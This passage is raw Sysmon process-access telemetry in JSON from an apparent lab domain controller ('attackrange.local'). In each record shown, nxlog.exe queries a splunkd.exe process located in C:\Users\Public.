{"EventTime":"2020-08-01 06:58:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:41.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:41.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:42.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:42.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:43.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:43.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:44.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:44.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:45.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:45.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:46.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:46.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:47.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 